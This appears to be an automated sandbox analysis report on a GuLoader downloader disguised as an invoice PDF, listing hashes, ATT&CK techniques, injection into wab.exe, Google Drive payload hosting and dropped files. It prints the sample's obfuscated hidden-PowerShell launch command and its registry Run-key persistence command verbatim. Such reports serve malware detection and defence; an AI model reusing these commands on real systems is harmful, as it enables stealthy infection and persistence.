guloader | a77c2d0242aa3601ba7b257ab9bdb4fcb717f64a8cd6da3178e517bb2843f2eb

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-06-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

faktura_7171503997·pdf.exe
Size

648KB
MD5

af7493a9e9ea9a5181ebc8ba0c3bb7bc
SHA1

809de7c88d3a53a4ec803c37e232c12037c48911
SHA256

a77c2d0242aa3601ba7b257ab9bdb4fcb717f64a8cd6da3178e517bb2843f2eb
SHA512

214bef965ff2a8113c05fd371173c72fd94c36e9bfefc102858d2aab4c0f2c0f03773835405d1e489f5ce73243cb2b5b84d256a90d5cc5a8356dfce9b45b1226
SSDEEP

6144:z9KOQS4B4GMSGJpFhsiivgUroam4nt5wf1CEH/+57/B0wU683FbyZc3q64drI1RJ:zsB4GOsPoamI4dCEm5750wUB3F+xxw

Score

10^/10

guloader downloader execution persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1776 powershell.exe
Loads dropped DLL 4 IoCs

Processes:

faktura_7171503997·pdf.exe

pid process

2212 faktura_7171503997·pdf.exe
2212 faktura_7171503997·pdf.exe
2212 faktura_7171503997·pdf.exe
2212 faktura_7171503997·pdf.exe

pid	process
1776	powershell.exe

pid	process
2212	faktura_7171503997·pdf.exe
2212	faktura_7171503997·pdf.exe
2212	faktura_7171503997·pdf.exe
2212	faktura_7171503997·pdf.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Schultz = "%Enterotomy% -windowstyle minimized $Mesopleural=(Get-ItemProperty -Path 'HKCU:\\Duerne16\\').Bureaukratisme;%Enterotomy% ($Mesopleural)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

3 drive.google.com
5 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2292 wab.exe
2292 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1776 powershell.exe
2292 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1776 set thread context of 2292 1776 powershell.exe wab.exe
Drops file in Windows directory 1 IoCs

Processes:

faktura_7171503997·pdf.exe

description ioc process

File opened for modification C:\Windows\Fonts\anorakkerne.ini faktura_7171503997·pdf.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2296 reg.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exe

pid process

1776 powershell.exe
1776 powershell.exe
1776 powershell.exe
1776 powershell.exe
1776 powershell.exe
1776 powershell.exe
1776 powershell.exe
1776 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1776 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1776 powershell.exe

flow	ioc
3	drive.google.com
5	drive.google.com

pid	process
2292	wab.exe
2292	wab.exe

pid	process
1776	powershell.exe
2292	wab.exe

description	pid	process	target process
PID 1776 set thread context of 2292	1776	powershell.exe	wab.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts\anorakkerne.ini	faktura_7171503997·pdf.exe

pid	process
2296	reg.exe

pid	process
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe

pid	process
1776	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1776	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

faktura_7171503997·pdf.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2212 wrote to memory of 1776	2212	faktura_7171503997·pdf.exe	powershell.exe
PID 2212 wrote to memory of 1776	2212	faktura_7171503997·pdf.exe	powershell.exe
PID 2212 wrote to memory of 1776	2212	faktura_7171503997·pdf.exe	powershell.exe
PID 2212 wrote to memory of 1776	2212	faktura_7171503997·pdf.exe	powershell.exe
PID 1776 wrote to memory of 2292	1776	powershell.exe	wab.exe
PID 1776 wrote to memory of 2292	1776	powershell.exe	wab.exe
PID 1776 wrote to memory of 2292	1776	powershell.exe	wab.exe
PID 1776 wrote to memory of 2292	1776	powershell.exe	wab.exe
PID 1776 wrote to memory of 2292	1776	powershell.exe	wab.exe
PID 1776 wrote to memory of 2292	1776	powershell.exe	wab.exe
PID 2292 wrote to memory of 1908	2292	wab.exe	cmd.exe
PID 2292 wrote to memory of 1908	2292	wab.exe	cmd.exe
PID 2292 wrote to memory of 1908	2292	wab.exe	cmd.exe
PID 2292 wrote to memory of 1908	2292	wab.exe	cmd.exe
PID 1908 wrote to memory of 2296	1908	cmd.exe	reg.exe
PID 1908 wrote to memory of 2296	1908	cmd.exe	reg.exe
PID 1908 wrote to memory of 2296	1908	cmd.exe	reg.exe
PID 1908 wrote to memory of 2296	1908	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\faktura_7171503997·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\faktura_7171503997·pdf.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Falmedes=Get-Content 'C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Indstningernes.Svi';$Almuten=$Falmedes.SubString(68669,3);.$Almuten($Falmedes)"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Schultz" /t REG_EXPAND_SZ /d "%Enterotomy% -windowstyle minimized $Mesopleural=(Get-ItemProperty -Path 'HKCU:\Duerne16\').Bureaukratisme;%Enterotomy% ($Mesopleural)"
4⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Schultz" /t REG_EXPAND_SZ /d "%Enterotomy% -windowstyle minimized $Mesopleural=(Get-ItemProperty -Path 'HKCU:\Duerne16\').Bureaukratisme;%Enterotomy% ($Mesopleural)"
5⤵
- Adds Run key to start application
- Modifies registry key
PID:2296

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Gyptologiske.Udl
Filesize
334KB

MD5
736d09ecac96c2df1113a1a8cba47a69

SHA1
e335b76dafc2a78ff57db7bb2cbaf84c0a5aeb81

SHA256
848eeb17eac68ad07de0c7deee17f38a5e9fbe41c105323fccd7138770384167

SHA512
bd51abcdb99d5df07da84e862d93ebd6d9940f112f602a550a492dfbcc9e7ab75233b10716f123b95f3bc2ac528a327bba75c82779a4966327a1cae0e38a306c

Download Submit
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Indstningernes.Svi
Filesize
67KB

MD5
aa8fd270726e1b8912b67cfd401820dd

SHA1
2368c97236dcca147773e395eeca9501a805888c

SHA256
0f70c603d4b3a4aa5790a4caf3514dc0860b2203c7c2ef4aac1be3e40cef385a

SHA512
3aa23daa46c6d712bbff250fc38002fede249419f10cd2be909e20e095d7320d8f4792cf42009038cd95c7b448ea16a5d0c0fab1823e0fb8f28827827a55f299

Download Submit
C:\Users\Admin\Pictures\slukningen.lnk
Filesize
1010B

MD5
cf1080a2c5771c8ec23b2839c247c1f0

SHA1
ac2d22722bb356b5c70cceccf41c4c099565f82e

SHA256
b8a205c5130d83fcf735ae48fdcba6f68e6d7dc391fdfa5e0e55e32ebcb07748

SHA512
4c7f785bebac2fdbcc7364a8091001d3c5b3f4b5b0c8c0f21321ea8a52e23b938c1a289dee64c7bb4a7f6821b5d2d6b23b1b6d8af655fb8e31c78c0ff6161313

Download Submit
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\AdvSplash.dll
Filesize
6KB

MD5
6def2cf3daf850acdc1a3e7340a439c4

SHA1
95d0d26f60cd5af697502cd5e53a54913ab188fb

SHA256
3ec3cf21a99ab0533ec2c451df3b5542733f70b972089d5c321ad7ae3b87d175

SHA512
16b1cf4783284d4a1282c569f5c416c713b4b339efcd4d3948bdf7da2194c597bd732d07ba9fabafcab323ba8c8da68845d4435ab9d1916b1810087ee1f5c413

Download Submit
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\BgImage.dll
Filesize
7KB

MD5
2bb17d45e5ad92053ce1e500408dd8a9

SHA1
f5d3a7ee6e28df532e9ce33976c92ff30a5665e4

SHA256
71ce676703dad028e4083e6b960b1ed89885877079d46d5021506eaa6d99db53

SHA512
efdcb476b9b9b5691fe6b9cd77ecbe48d50c6683da01fd51c6b428cc262528fb3dcd295abe28718321b2307b0e032fcb599588f1eb00a93fd9e6a1f7b322b41f

Download Submit
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\UserInfo.dll
Filesize
4KB

MD5
8ef0e4eb7c89cdd2b552de746f5e2a53

SHA1
820f681e7cec409a02b194a487d1c8af1038acf0

SHA256
41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc

SHA512
a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5

Download Submit
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\nsExec.dll
Filesize
6KB

MD5
c129bc26a26be6f5816a03520bb37833

SHA1
18100042155f948301701744b131c516bf26ddb8

SHA256
d3694fa0503158194129d113fcc1c83177ff5a5f93d898ce0bcfe9ce12f06bf4

SHA512
dbe79859c41e00a6e951cee889e7f0de29a712792fb531662285a2d6e384884518c7d5d983894c185b3d31d81213d2477cf4576b0114d352b759fe07a1704e63

Download Submit
memory/1776-159-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1776-158-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1776-162-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1776-157-0x0000000073C41000-0x0000000073C42000-memory.dmp

Filesize
4KB

Download
memory/1776-164-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/1776-165-0x0000000006810000-0x000000000A15D000-memory.dmp

Filesize
57.3MB

Download
memory/1776-166-0x0000000073C40000-0x00000000741EB000-memory.dmp

Filesize
5.7MB

Download
memory/2292-188-0x0000000001A00000-0x000000000534D000-memory.dmp

Filesize
57.3MB

Download